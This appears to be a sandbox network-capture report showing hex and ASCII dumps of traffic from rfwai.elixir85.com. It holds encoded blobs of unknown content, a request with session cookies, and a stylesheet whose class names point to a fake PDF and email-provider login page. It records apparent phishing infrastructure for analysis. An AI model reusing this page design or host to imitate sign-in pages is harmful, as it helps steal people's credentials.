                                                        2024-07-03 19:07:19 UTC1369INData Raw: 47 7a 38 37 4c 77 35 49 4b 43 41 2f 51 51 6f 6b 64 43 4a 52 42 6a 38 67 49 78 6b 4d 4d 7a 6f 31 55 52 70 72 4a 6a 52 62 47 7a 4d 6d 65 6a 6c 69 61 32 56 78 46 55 39 32 64 47 45 55 53 47 74 6c 4d 31 51 4d 50 54 4d 7a 57 78 30 6c 49 58 78 47 42 69 77 78 65 78 51 4c 4a 44 4d 30 52 30 4d 31 4f 7a 64 52 47 6e 42 49 57 78 56 50 64 6e 52 68 46 45 68 72 5a 58 45 56 54 7a 55 37 4c 56 73 61 63 57 56 79 42 41 31 6e 4e 6e 42 57 55 30 5a 50 63 52 56 50 64 6e 52 68 46 45 67 32 53 46 73 56 54 33 5a 30 54 44 35 49 61 32 56 78 46 55 39 32 64 47 39 57 48 43 56 6c 4b 6a 68 6c 64 6e 52 68 46 45 68 72 5a 58 45 56 54 33 5a 30 4c 46 55 61 4c 43 77 2f 44 30 39 6d 64 48 45 55 57 47 73 6b 4a 45 45 41 62 56 6c 4c 46 45 68 72 5a 58 45 56 54 33 5a 30 59 52 52 49 4c 79 77 69 52 51 4d
                                                        Data Ascii: Gz87Lw5IKCA/QQokdCJRBj8gIxkMMzo1URprJjRbGzMmejlia2VxFU92dGEUSGtlM1QMPTMzWx0lIXxGBiwxexQLJDM0R0M1OzdRGnBIWxVPdnRhFEhrZXEVTzU7LVsacWVyBA1nNnBWU0ZPcRVPdnRhFEg2SFsVT3Z0TD5Ia2VxFU92dG9WHCVlKjhldnRhFEhrZXEVT3Z0LFUaLCw/D09mdHEUWGskJEEAbVlLFEhrZXEVT3Z0YRRILywiRQM
                                                        2024-07-03 19:07:19 UTC512INData Raw: 7a 45 35 44 30 39 6e 5a 48 6c 45 45 48 42 49 57 78 56 50 64 6e 52 68 46 45 68 72 5a 58 45 56 54 7a 51 31 49 6c 38 50 4f 53 6f 6b 57 77 74 37 4a 69 52 45 44 53 6f 78 61 78 55 42 4f 58 6b 7a 55 52 67 75 4a 43 55 4f 59 6c 78 30 59 52 52 49 61 32 56 78 46 55 39 32 64 47 46 57 43 53 67 75 4e 6b 63 41 49 7a 6f 6c 47 52 73 69 50 7a 51 50 54 7a 55 37 4c 30 41 4a 49 69 74 71 4f 47 56 32 64 47 45 55 53 47 74 6c 63 55 68 69 58 48 52 68 46 45 68 33 61 69 4a 42 46 6a 6f 78 66 7a 6c 69 61 32 56 78 46 56 4d 6c 4e 7a 4e 64 47 44 39 37 58 44 39 50 64 6e 52 68 52 77 30 2f 44 44 39 42 43 69 51 69 49 46 68 41 59 32 78 78 43 46 46 32 4c 30 77 2b 53 47 74 6c 63 56 59 41 4f 43 63 31 46 42 78 37 5a 57 77 56 4b 7a 63 67 4a 42 6f 47 4a 44 4a 35 48 46 52 62 58 6d 45 55 53 47 73 67
                                                        Data Ascii: zE5D09nZHlEEHBIWxVPdnRhFEhrZXEVTzQ1Il8POSokWwt7JiREDSoxaxUBOXkzURguJCUOYlx0YRRIa2VxFU92dGFWCSguNkcAIzolGRsiPzQPTzU7L0AJIitqOGV2dGEUSGtlcUhiXHRhFEh3aiJBFjoxfzlia2VxFVMlNzNdGD97XD9PdnRhRw0/DD9BCiQiIFhAY2xxCFF2L0w+SGtlcVYAOCc1FBx7ZWwVKzcgJBoGJDJ5HFRbXmEUSGsg
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 33 34 37 33 0d 0a 47 47 7a 63 6d 4e 56 6f 4e 50 47 64 76 4f 47 56 71 64 57 77 5a 53 42 67 77 4d 6c 59 4b 4a 53 64 68 58 52 74 72 4b 7a 35 42 54 7a 38 36 59 55 4d 41 4b 6a 46 78 54 41 41 6a 64 43 6c 56 48 69 35 70 63 56 63 61 49 6e 51 32 58 41 64 72 50 44 35 41 54 7a 63 6d 4a 42 70 49 5a 6d 68 76 50 31 4d 79 50 54 63 55 41 53 39 34 63 30 59 4b 4e 53 41 6f 57 77 59 34 5a 33 46 57 41 7a 63 6e 4d 67 6c 4b 61 58 74 63 50 30 39 32 64 47 45 49 47 79 34 6d 4a 56 77 41 4f 48 51 6f 55 46 56 70 4e 6a 52 57 47 7a 38 37 4c 32 73 63 4f 54 77 34 57 77 67 69 4f 7a 4a 64 44 79 55 73 50 78 64 50 4a 53 41 34 57 41 31 32 5a 7a 42 62 42 6a 73 31 4e 56 30 48 4a 58 38 69 58 51 41 68 65 53 64 47 42 79 5a 6f 49 31 77 49 50 69 42 68 42 45 5a 2b 4e 6d 6f 58 54 7a 55 34 49 45 63 62
                                                        Data Ascii: 3473GGzcmNVoNPGdvOGVqdWwZSBgwMlYKJSdhXRtrKz5BTz86YUMAKjFxTAAjdClVHi5pcVcaInQ2XAdrPD5ATzcmJBpIZmhvP1MyPTcUAS94c0YKNSAoWwY4Z3FWAzcnMglKaXtcP092dGEIGy4mJVwAOHQoUFVpNjRWGz87L2scOTw4WwgiOzJdDyUsPxdPJSA4WA12ZzBbBjs1NV0HJX8iXQAheSdGByZoI1wIPiBhBEZ+NmoXTzU4IEcb
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 63 6e 4d 67 6c 4b 50 79 77 6c 57 51 70 32 4f 53 4d 5a 57 58 31 6c 50 45 46 43 5a 32 4a 6a 43 6a 77 35 50 44 68 62 43 48 59 67 4c 68 51 62 49 69 49 2f 46 52 59 35 49 57 46 64 42 6e 64 71 4f 51 64 52 57 31 35 68 46 45 68 72 5a 58 45 56 54 33 5a 30 59 52 52 55 4c 79 77 6e 46 51 77 36 4e 54 4a 48 56 57 6b 6e 50 6b 45 62 4f 54 6b 79 55 51 73 2f 4c 44 35 62 54 57 68 5a 53 78 52 49 61 32 56 78 46 55 39 32 64 47 45 55 53 48 63 6b 63 56 30 64 4d 7a 4a 38 46 6b 74 70 65 78 4a 55 41 54 55 78 4c 51 68 48 4b 6e 74 63 50 31 4e 33 65 57 77 55 56 43 38 73 4a 77 73 32 4f 53 46 68 58 77 59 6b 4d 6e 46 4d 41 43 4e 30 49 45 59 4e 61 79 6f 2f 46 52 73 2b 4d 57 46 47 42 79 6f 68 63 55 45 41 64 69 63 30 56 77 73 75 4e 69 49 56 42 6a 42 30 4f 46 73 64 61 7a 49 2b 51 41 4d 79 64
                                                        Data Ascii: cnMglKPywlWQp2OSMZWX1lPEFCZ2JjCjw5PDhbCHYgLhQbIiI/FRY5IWFdBndqOQdRW15hFEhrZXEVT3Z0YRRULywnFQw6NTJHVWknPkEbOTkyUQs/LD5bTWhZSxRIa2VxFU92dGEUSHckcV0dMzJ8FktpexJUATUxLQhHKntcP1N3eWwUVC8sJws2OSFhXwYkMnFMACN0IEYNayo/FRs+MWFGByohcUEAdic0VwsuNiIVBjB0OFsdazI+QAMyd
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 31 57 68 74 37 4d 69 31 62 43 54 38 73 50 31 4a 4e 61 47 68 75 55 41 45 39 65 31 77 2f 54 33 5a 30 59 52 52 49 61 32 56 78 46 55 39 32 64 47 45 55 53 48 63 68 4f 45 4e 50 4e 54 67 67 52 78 74 32 5a 7a 56 61 47 33 73 79 4c 56 73 4a 50 79 77 2f 55 6b 31 6f 61 47 35 51 41 54 31 37 58 44 39 54 64 33 6c 73 46 46 51 76 4c 43 63 4c 50 43 49 37 4d 52 51 4c 49 79 51 69 58 41 45 78 64 44 56 63 44 57 73 6f 50 6c 73 4b 4c 33 51 67 57 67 78 72 4e 69 56 55 48 53 4a 30 49 6c 77 4a 4f 43 77 2f 55 6b 38 69 50 43 51 55 47 43 6f 32 49 6c 77 41 4f 48 70 39 47 77 77 69 4d 32 38 56 51 6e 74 71 53 78 52 49 61 32 56 78 46 55 39 32 64 47 45 55 53 47 74 6c 63 52 56 54 4d 6a 30 33 46 41 73 6e 4a 43 4a 47 55 6e 51 77 4c 6b 42 46 4c 53 6b 2b 56 42 73 2f 4f 69 59 57 56 6e 64 71 4e 56
                                                        Data Ascii: 1Wht7Mi1bCT8sP1JNaGhuUAE9e1w/T3Z0YRRIa2VxFU92dGEUSHchOENPNTggRxt2ZzVaG3syLVsJPyw/Uk1oaG5QAT17XD9Td3lsFFQvLCcLPCI7MRQLIyQiXAExdDVcDWsoPlsKL3QgWgxrNiVUHSJ0IlwJOCw/Uk8iPCQUGCo2IlwAOHp9GwwiM28VQntqSxRIa2VxFU92dGEUSGtlcRVTMj03FAsnJCJGUnQwLkBFLSk+VBs/OiYWVndqNV
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 48 47 73 38 50 6b 42 50 4e 79 59 6b 46 41 77 6b 4c 44 39 53 51 33 59 74 4c 6b 46 49 50 43 77 39 57 55 38 30 4d 57 46 48 48 53 67 6d 4e 45 59 63 4d 43 45 74 47 6c 52 6b 49 54 68 44 55 58 5a 35 62 41 70 69 61 32 56 78 46 55 39 32 64 47 45 55 53 47 74 6c 63 52 56 50 64 6e 52 68 46 45 68 33 4c 44 39 46 47 69 4a 30 4b 46 42 56 61 53 77 2f 52 54 41 6a 4f 69 42 5a 44 57 6c 6c 4a 55 77 66 4d 32 6c 6a 51 41 30 7a 4d 58 4d 56 41 54 63 35 4a 41 6c 4b 50 69 73 77 57 41 70 30 64 43 4a 59 43 54 67 32 62 42 63 47 4f 43 51 30 51 45 70 72 4a 43 52 42 41 44 55 37 4c 45 51 45 4c 6a 45 30 43 45 30 35 4d 69 63 57 53 44 30 6b 50 55 41 4b 61 33 5a 6a 46 42 67 6e 4a 44 4a 51 42 7a 6b 34 4a 56 45 61 64 6d 63 55 57 41 34 2f 4f 47 30 55 47 43 4d 71 50 31 42 44 64 6a 73 7a 46 44 73
                                                        Data Ascii: HGs8PkBPNyYkFAwkLD9SQ3YtLkFIPCw9WU80MWFHHSgmNEYcMCEtGlRkIThDUXZ5bApia2VxFU92dGEUSGtlcRVPdnRhFEh3LD9FGiJ0KFBVaSw/RTAjOiBZDWllJUwfM2ljQA0zMXMVATc5JAlKPiswWAp0dCJYCTg2bBcGOCQ0QEprJCRBADU7LEQELjE0CE05MicWSD0kPUAKa3ZjFBgnJDJQBzk4JVEadmcUWA4/OG0UGCMqP1BDdjszFDs
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 6a 41 7a 55 51 6b 6d 4e 6e 46 57 44 6a 68 30 49 6c 73 46 4c 6d 55 6c 52 78 6f 7a 64 43 68 53 53 44 77 67 63 56 30 4f 49 44 46 68 51 41 41 75 5a 54 4a 61 47 69 51 31 4a 6c 46 49 50 79 70 78 52 52 6f 6b 4a 7a 52 52 53 44 38 74 4e 46 68 42 61 6e 73 6c 58 52 35 31 5a 58 77 59 55 56 78 30 59 52 52 49 61 32 56 78 46 55 39 32 64 47 45 49 47 47 73 6d 50 56 51 63 4a 57 6c 6a 58 41 6b 34 61 44 68 57 41 44 68 30 4c 46 5a 46 65 32 64 78 52 68 73 76 4f 43 51 4a 53 69 30 71 50 30 46 43 4a 54 30 37 55 56 4a 36 63 43 46 4e 56 48 52 71 66 55 63 59 4b 69 74 78 56 67 4d 33 4a 7a 49 4a 53 69 49 6d 50 6c 74 4e 61 47 67 6f 57 51 39 72 4e 69 4e 57 55 6e 51 37 4d 56 77 35 4c 51 6f 51 66 68 34 33 5a 58 49 45 58 6e 6f 4e 59 77 59 4b 48 32 31 33 65 52 38 61 64 44 68 7a 58 7a 30 4f
                                                        Data Ascii: jAzUQkmNnFWDjh0IlsFLmUlRxozdChSSDwgcV0OIDFhQAAuZTJaGiQ1JlFIPypxRRokJzRRSD8tNFhBanslXR51ZXwYUVx0YRRIa2VxFU92dGEIGGsmPVQcJWljXAk4aDhWADh0LFZFe2dxRhsvOCQJSi0qP0FCJT07UVJ6cCFNVHRqfUcYKitxVgM3JzIJSiImPltNaGgoWQ9rNiNWUnQ7MVw5LQoQfh43ZXIEXnoNYwYKH213eR8adDhzXz0O


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.549780104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1363OUTGET /12C1tM2Y6lGcdYEVUZu6720 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC635INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: text/css;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="12C1tM2Y6lGcdYEVUZu6720"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5m30v4W3rMy%2Fcuybc0uDBjhuRPv4mOGIEdJCaDPs8uTDPP3dqxf6oEOvrd5nlvvohp9hctaEnP390ja3rQkZHxw2Rj%2Br5OPNUr8WkJQUqkKkGTGTjFcf%2FiAc3ahtRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286c7dd57274-EWR
                                                        2024-07-03 19:07:21 UTC734INData Raw: 33 37 62 33 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                        Data Ascii: 37b3*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 61 7b 63 6f 6c
                                                        Data Ascii: Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{col
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72 61 6e 73 66 6f 72 6d
                                                        Data Ascii: background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){transform
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63
                                                        Data Ascii: gba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-direction:c
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f
                                                        Data Ascii: s:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_pdf .lo
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d
                                                        Data Ascii: gin .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;border-
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65
                                                        Data Ascii: om{opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-function:e
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a
                                                        Data Ascii: -container.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent{position:
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 69 67 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64 65 73 63 7b 66 6f 6e 74 2d 73
                                                        Data Ascii: ight:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalldesc{font-s
